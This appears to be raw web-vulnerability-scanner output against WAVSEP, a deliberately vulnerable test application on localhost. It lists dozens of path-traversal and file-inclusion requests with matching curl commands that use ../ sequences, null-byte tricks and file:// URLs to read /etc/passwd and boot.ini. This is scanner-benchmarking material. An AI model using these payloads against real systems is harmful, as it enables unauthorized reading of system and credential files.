Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
